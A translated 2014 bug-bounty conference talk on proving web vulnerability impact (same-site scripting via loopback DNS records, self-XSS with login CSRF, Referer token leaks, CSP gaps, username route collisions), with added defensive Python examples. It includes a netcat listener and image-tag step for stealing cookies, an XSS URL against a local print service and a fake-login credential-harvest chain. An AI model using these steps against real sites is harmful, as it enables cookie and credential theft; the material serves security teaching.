![Page 1: Sergey Belov - Покажите нам Impact! Доказываем угрозу в сложных условиях](https://reader034.vdocuments.site/reader034/viewer/2022042606/54639906b1af9fce588b45b2/html5/thumbnails/1.jpg)
Show Us the Impact! Proving a threat under difficult conditions
30/08/2014 DCG #7812
St. Petersburg
@sergeybelove
Hey
Work/Activity: bug hunting, speaker, CTF
Defcon Russia (DCG #7812)
Bug Bounty
Something is wrong, but I don't know what
Situation #1 – Same Site Scripting
XXXYYYZZZ.target.com => 127.0.0.1
What’s wrong?
External IP: 12.34.56.78
Loopback: 127.0.0.1
Attacker:
1) nc -lv 10024
2) Send an email to [email protected] containing <img src="http://xxyyzz.target.com:10024">
Victim:
1) Opens the email and...
2) Loads the image, sending the *.target.com cookies to the attacker's listener! (That is why it is important to know how to set cookies correctly: http://habrahabr.ru/post/143276/)
http://localhost.domain.com:631/<SCRIPT>XSS</SCRIPT>.shtml
(Port 631 is the IPP/CUPS print service that many workstations run on loopback; a domain.com name that resolves to 127.0.0.1 lets an XSS in that local service execute in the domain.com origin.)
XXXYYYZZZ.target.com => 10.0.0.22
http://lab.onsec.ru/2013/07/insecure-dns-records-in-top-web-projects.html
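An added example (not from the talk) that automates the two checks behind Situation #1: flag zone records that send a *.target.com name to the client's own host or LAN (the 127.0.0.1 and 10.0.0.22 cases above), and show, with RFC 6265 domain matching, why a cookie scoped to .target.com travels to the attacker's listener on any port while a host-only cookie does not. The record set, hostnames and addresses are constructed for the demo.

```python
import ipaddress

# Constructed records standing in for the output of a DNS sweep of a target's
# subdomains; the names and addresses are assumptions, not real hosts.
RECORDS = [
    ("www.target.com", "12.34.56.78"),
    ("xxxyyyzzz.target.com", "127.0.0.1"),
    ("dev.target.com", "10.0.0.22"),
    ("ipv6-test.target.com", "::1"),
]


def classify(ip_text):
    """Return why an A/AAAA target is dangerous behind a public name, or None."""
    ip = ipaddress.ip_address(ip_text)
    if ip.is_loopback:
        return "loopback"        # 127.0.0.0/8, ::1 -> same-site scripting
    if ip.is_link_local:
        return "link-local"      # 169.254.0.0/16, fe80::/10
    if ip.is_unspecified:
        return "unspecified"     # 0.0.0.0, ::
    if ip.is_private:
        return "private"         # RFC 1918 / ULA -> points into the LAN
    return None


def dangerous_records(records):
    """Keep the (name, ip) pairs a victim's browser would resolve to its own machine or network."""
    found = []
    for name, ip in records:
        reason = classify(ip)
        if reason:
            found.append((name, ip, reason))
    return found


def domain_match(request_host, cookie_domain):
    """RFC 6265 section 5.1.3 domain matching. Hosts are compared case-insensitively
    and the request port plays no role at all."""
    request_host = request_host.lower().rstrip(".")
    cookie_domain = cookie_domain.lower().lstrip(".").rstrip(".")
    if request_host == cookie_domain:
        return True
    try:
        ipaddress.ip_address(request_host)
        return False             # an IP literal never domain-matches a suffix
    except ValueError:
        pass
    return request_host.endswith("." + cookie_domain)


def cookie_sent(cookie, request_host):
    """Would the browser attach this cookie to a request for request_host?

    cookie = {"name": ..., "set_by": host that set it, "domain": Domain attribute or None}
    """
    if cookie["domain"] is None:                       # host-only cookie
        return request_host.lower() == cookie["set_by"].lower()
    return domain_match(request_host, cookie["domain"])


ZONE_WIDE_SESSION = {"name": "sid", "set_by": "www.target.com", "domain": ".target.com"}
HOST_ONLY_SESSION = {"name": "sid", "set_by": "www.target.com", "domain": None}

if __name__ == "__main__":
    for name, ip, why in dangerous_records(RECORDS):
        print(f"{name} -> {ip} ({why})")
    # <img src=http://xxxyyyzzz.target.com:10024> pulls the zone-wide cookie to the listener...
    print("zone-wide cookie sent:", cookie_sent(ZONE_WIDE_SESSION, "xxxyyyzzz.target.com"))
    # ...while a host-only cookie stays with www.target.com.
    print("host-only cookie sent:", cookie_sent(HOST_ONLY_SESSION, "xxxyyyzzz.target.com"))
```

The fix has two halves, and the example checks both: remove (or never create) records that resolve public names to loopback or private space, and stop setting session cookies with a Domain attribute unless every present and future host under that suffix is trusted.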
https://hackerone.com/reports/1509 - $100
Situation #2 – Self XSS
XSS only for you – no impact?
Requirements:
1) CSRF for logout O_o
2) CSRF for login o_O
Steps:
1) Save the (self-)XSS in your own account
2) Log the victim out
3) Log the victim in with your credentials
4) Draw a fake login window
5) Catch the user's credentials!
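The chain above only works because logout and login accept cross-site requests. The following is an added example (not code from the talk or from any real site) of login and logout handlers that close both doors: an anonymous session gets a session-bound CSRF token before login, both endpoints require POST plus that token, Origin and Sec-Fetch-Site are checked as defence in depth, and the session id is rotated on success. The user table, server key and origin are constructed for the demo; `forged_login` replays step 3 of the attack against these handlers.

```python
import hashlib
import hmac
import secrets

# Constructed user table, server key and site origin; all are assumptions for the demo.
USERS = {"alice": "correct horse battery", "attacker": "hunter2"}
SERVER_KEY = secrets.token_bytes(32)
SITE_ORIGIN = "https://site.example"


class Session:
    """Server-side session. Anonymous visitors get one too, so the login form can carry a token."""

    def __init__(self):
        self.id = secrets.token_urlsafe(32)
        self.user = None


def csrf_token(session):
    """Token derived from the session id; a cross-site page can neither read nor predict it."""
    return hmac.new(SERVER_KEY, session.id.encode(), hashlib.sha256).hexdigest()


def csrf_ok(session, form, headers):
    """The session-bound token is mandatory; Origin / Sec-Fetch-Site add defence in depth.
    A missing header is tolerated (same-origin GET navigations omit Origin); a wrong one is not."""
    if "Origin" in headers and headers["Origin"] != SITE_ORIGIN:
        return False
    if headers.get("Sec-Fetch-Site", "same-origin") not in ("same-origin", "none"):
        return False
    return hmac.compare_digest(form.get("csrf", ""), csrf_token(session))


def login(session, method, headers, form):
    """Returns (status, session). Logging someone in is a state change and is protected like any write."""
    if method != "POST":
        return 405, session
    if not csrf_ok(session, form, headers):
        return 403, session
    if USERS.get(form.get("user")) != form.get("password"):
        return 401, session
    fresh = Session()            # rotate the id at the privilege boundary (no session fixation)
    fresh.user = form["user"]
    return 200, fresh


def logout(session, method, headers, form):
    if method != "POST" or not csrf_ok(session, form, headers):
        return 403, session
    return 200, Session()


def forged_login(victim_session):
    """Step 3 of the slides as a cross-site auto-submitting form: the attacker's own credentials,
    sent from the victim's browser. The attacker cannot know the victim's session-bound token."""
    headers = {"Origin": "https://attacker.example", "Sec-Fetch-Site": "cross-site"}
    form = {"user": "attacker", "password": "hunter2", "csrf": "anything-the-attacker-guesses"}
    status, session = login(victim_session, "POST", headers, form)
    return status, session.user


def honest_login(session, user, password):
    """A same-origin submission of the real login form, token included."""
    form = {"user": user, "password": password, "csrf": csrf_token(session)}
    headers = {"Origin": SITE_ORIGIN, "Sec-Fetch-Site": "same-origin"}
    return login(session, "POST", headers, form)


if __name__ == "__main__":
    print("forged login:", forged_login(Session()))             # (403, None)
    status, s = honest_login(Session(), "alice", "correct horse battery")
    print("honest login:", status, s.user)
    print("GET logout:", logout(s, "GET", {}, {})[0])            # 403
```

With the victim unable to be logged out or logged into the attacker's account, the stored self-XSS never runs in anyone else's browser, which is exactly why the talk lists the two CSRF weaknesses as requirements.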
Google and self-XSS
Share account and attack your victim
Situation #3 – evil HTTP referers
<a href="http://external.com">Go!</a>
In the request headers:
...
Referer: http://yoursite.com/
...
But what about external resources on the web page, such as images, styles...?
http://super-website.com/user/passRecovery?t=SECRET
...
<img src=http://comics-are-awesome.com/howto-choose-password.jpg>
...
The owner of comics-are-awesome.com knows all _SECRET_ tokens (from the Referer)!
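To make the leak concrete, here is an added example (not from the talk) that implements the Referrer Policy algorithm for the Referer header and runs the slide's URLs through it. The function goes beyond the single case on the slide and covers every named policy. Under the policy browsers defaulted to in 2014 (`no-referrer-when-downgrade`) the full reset URL, token included, reaches the image host; under today's default (`strict-origin-when-cross-origin`) only the origin does. The two URLs are the slide's own; the token value and the extra test URLs are constructed.

```python
from urllib.parse import urlsplit, urlunsplit

DEFAULT_PORTS = {"http": 80, "https": 443}


def _parts(url):
    """scheme, host[:port] with userinfo and default port removed, path, query."""
    p = urlsplit(url)
    host = (p.hostname or "").lower()
    netloc = host if p.port in (None, DEFAULT_PORTS.get(p.scheme)) else f"{host}:{p.port}"
    return p.scheme.lower(), netloc, p.path or "/", p.query


def full_referrer(url):
    scheme, netloc, path, query = _parts(url)
    return urlunsplit((scheme, netloc, path, query, ""))   # fragment and credentials are never sent


def origin_referrer(url):
    scheme, netloc, _, _ = _parts(url)
    return f"{scheme}://{netloc}/"


def same_origin(a, b):
    return _parts(a)[:2] == _parts(b)[:2]


def is_downgrade(page_url, request_url):
    """An https page fetching an http resource."""
    return _parts(page_url)[0] == "https" and _parts(request_url)[0] != "https"


def referer_header(page_url, request_url, policy="no-referrer-when-downgrade"):
    """Referer value a browser sends for a request made from page_url under `policy`, or None."""
    if policy == "no-referrer":
        return None
    if policy == "unsafe-url":
        return full_referrer(page_url)
    if policy == "origin":
        return origin_referrer(page_url)
    if policy == "no-referrer-when-downgrade":
        return None if is_downgrade(page_url, request_url) else full_referrer(page_url)
    if policy == "strict-origin":
        return None if is_downgrade(page_url, request_url) else origin_referrer(page_url)
    if policy == "same-origin":
        return full_referrer(page_url) if same_origin(page_url, request_url) else None
    if policy == "origin-when-cross-origin":
        return full_referrer(page_url) if same_origin(page_url, request_url) else origin_referrer(page_url)
    if policy == "strict-origin-when-cross-origin":
        if same_origin(page_url, request_url):
            return full_referrer(page_url)
        return None if is_downgrade(page_url, request_url) else origin_referrer(page_url)
    raise ValueError(f"unknown policy {policy!r}")


# The slide's URLs; "SECRET" stands in for a real reset token.
RESET_PAGE = "http://super-website.com/user/passRecovery?t=SECRET"
THIRD_PARTY_IMG = "http://comics-are-awesome.com/howto-choose-password.jpg"


def token_leaks(policy, page_url=RESET_PAGE, request_url=THIRD_PARTY_IMG, token="SECRET"):
    """True if the third party sees the token in the Referer header."""
    ref = referer_header(page_url, request_url, policy)
    return ref is not None and token in ref


if __name__ == "__main__":
    for policy in ("no-referrer-when-downgrade", "strict-origin-when-cross-origin", "same-origin"):
        print(f"{policy:34} -> {referer_header(RESET_PAGE, THIRD_PARTY_IMG, policy)}")
```

Setting a `Referrer-Policy` header (or `rel="noreferrer"` on links) is the cheap mitigation, but the durable one is not to leave a secret in the URL of a page that loads third-party content at all: consume the token server-side and redirect to a token-free page before rendering anything.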
https://hackerone.com/reports/738 - $100
Situation #5 - Content-Security-Policy
CSP only for some browsers! Is it OK?
1) Forks with a different UA
2) Proxy cache
3) Load balancer...
The bug hunter got $100, but...
Fail! Why:
• "Partial support in Internet Explorer 10-11 refers to the browser only supporting the 'sandbox' directive by using the 'X-Content-Security-Policy' header."
• "Partial support in iOS Safari 5.0-5.1 refers to the browser recognizing the X-Webkit-CSP header but failing to handle complex cases correctly, often resulting in broken pages."
• "Chrome for iOS fails to render pages without a connect-src 'self' policy."
• Old Firefox problems (some versions between XX and YY)
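An added example (not from the talk or any real site) of why gating CSP on the User-Agent fails in the two ways listed above: a browser fork whose UA string lacks the expected token gets no policy, and a shared cache keyed on URL alone serves whichever variant it saw first to everyone behind it. The handlers, the cache and the UA strings are constructed for the demo.

```python
CSP = "default-src 'self'; script-src 'self'; object-src 'none'"

# Constructed User-Agent strings; none is a recorded real client.
OLD_UA = "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)"
CHROME_UA = ("Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) "
             "Chrome/37.0.2062.94 Safari/537.36")
FORK_UA = ("Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) "
           "SomeFork/1.0 Safari/537.36")
PAGE = {"url": "https://site.example/profile", "body": "<html>...</html>"}


def response_ua_gated(request):
    """The pattern the slides criticise: emit CSP only to browsers the server believes support it."""
    headers = {"Content-Type": "text/html"}
    ua = request["headers"].get("User-Agent", "")
    if "Chrome/" in ua or "Firefox/" in ua:
        headers["Content-Security-Policy"] = CSP
    return {"status": 200, "headers": headers, "body": PAGE["body"]}


def response_unconditional(request):
    """Send the standard header to everyone; a client that does not understand it simply ignores it."""
    headers = {"Content-Type": "text/html", "Content-Security-Policy": CSP}
    return {"status": 200, "headers": headers, "body": PAGE["body"]}


class SharedCache:
    """A reverse proxy / CDN that keys on URL only, the usual default when the origin sends no Vary."""

    def __init__(self, origin):
        self.origin = origin
        self.store = {}

    def fetch(self, request):
        key = request["url"]
        if key not in self.store:
            self.store[key] = self.origin(request)   # first client's UA decides for everyone
        return self.store[key]


def has_csp(response):
    return "Content-Security-Policy" in response["headers"]


def csp_through_cache(origin, first_ua, second_ua):
    """Two clients behind one cache; returns whether each of them received a CSP header."""
    cache = SharedCache(origin)
    first = has_csp(cache.fetch({"url": PAGE["url"], "headers": {"User-Agent": first_ua}}))
    second = has_csp(cache.fetch({"url": PAGE["url"], "headers": {"User-Agent": second_ua}}))
    return first, second


if __name__ == "__main__":
    print("gated, old client warms cache:", csp_through_cache(response_ua_gated, OLD_UA, CHROME_UA))
    print("gated, fork direct:", has_csp(response_ua_gated({"url": PAGE["url"], "headers": {"User-Agent": FORK_UA}})))
    print("unconditional:", csp_through_cache(response_unconditional, OLD_UA, CHROME_UA))
```

Adding `Vary: User-Agent` would repair the cache case at the cost of fragmenting the cache per UA string, and would still miss the fork; a load balancer with one node on an older config behaves the same way as the cache. Sending the standard header unconditionally removes the whole class of problems.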
Situation #6 - Usernames
http://website.com/username
Okay! Let's register:
http://website.com/robots.txt
http://website.com/sitemap.xml
...
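An added example (not from the talk) of the two controls that stop a profile URL from shadowing a well-known file or an application route: a registration check that refuses reserved names after Unicode normalisation and a dispatcher that matches fixed routes and well-known files before the `/<username>` catch-all. The route table, reserved lists and usernames are constructed assumptions for the demo.

```python
import re
import unicodedata

# Constructed route table for a site serving profiles at /<username>; the paths are assumptions.
STATIC_ROUTES = {"/", "/login", "/logout", "/signup", "/settings", "/search"}
WELL_KNOWN_FILES = {
    "robots.txt", "sitemap.xml", "favicon.ico", "crossdomain.xml",
    "clientaccesspolicy.xml", "humans.txt", "ads.txt", "browserconfig.xml", "manifest.json",
}
RESERVED_NAMES = {
    "admin", "administrator", "root", "support", "help", "api", "www", "static",
    "assets", "media", "well-known", "login", "logout", "signup", "settings", "search",
}
# 3-32 chars, lowercase alphanumerics plus _ and -, no leading/trailing separator, no dots
USERNAME_RE = re.compile(r"[a-z0-9](?:[a-z0-9_-]{1,30}[a-z0-9])?")


def canonical(name):
    """NFKC folds full-width and other compatibility forms, so a look-alike of 'robots.txt'
    compares equal to the real thing before the reserved-name checks run."""
    return unicodedata.normalize("NFKC", name).strip().lower()


def username_rejection(name):
    """Reason a registration must be refused, or None if the name is safe to expose as /<name>."""
    n = canonical(name)
    if not n:
        return "empty"
    if n in WELL_KNOWN_FILES or n.startswith(".well-known"):
        return "collides with a well-known file"
    if n in RESERVED_NAMES or "/" + n in STATIC_ROUTES:
        return "reserved route or role name"
    if not USERNAME_RE.fullmatch(n):
        return "bad charset or length"       # also rules out dots, slashes and path tricks
    return None


def resolve(path, usernames):
    """Dispatch order: fixed routes and well-known files win over the /<username> catch-all,
    so even a name that slipped past registration cannot shadow them."""
    if path in STATIC_ROUTES:
        return ("static", path)
    segment = path.lstrip("/")
    if segment in WELL_KNOWN_FILES or segment.startswith(".well-known/"):
        return ("well-known", segment)
    if "/" not in segment and canonical(segment) in usernames:
        return ("profile", canonical(segment))
    return ("404", path)


if __name__ == "__main__":
    for candidate in ("robots.txt", "ｒobots.txt", "Admin", "../etc", "alice_01"):
        print(f"{candidate!r}: {username_rejection(candidate)}")
    print(resolve("/robots.txt", {"robots.txt"}))   # still the file, never a profile
```

Treat the reserved lists as living configuration: every new fixed route the application gains must be added before it ships, or an existing user may already own that name.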
Situations XXX
• Info disclosure via CSS files (full path disclosure left over from compilation: file\:\/\/\/applications\/hackerone\/releases\/20140221175929\/app\/assets\/stylesheets\/application\/browser-not-supported\.scss, bug #2221)
• SPF and similar records
• Short tokens
• Pixel flood attack
• CSRF for login/logout!? (hi Michal Zalewski!)
• ... - https://hackerone.com/security?show_all=true
Thanks! Questions?
@sergeybelove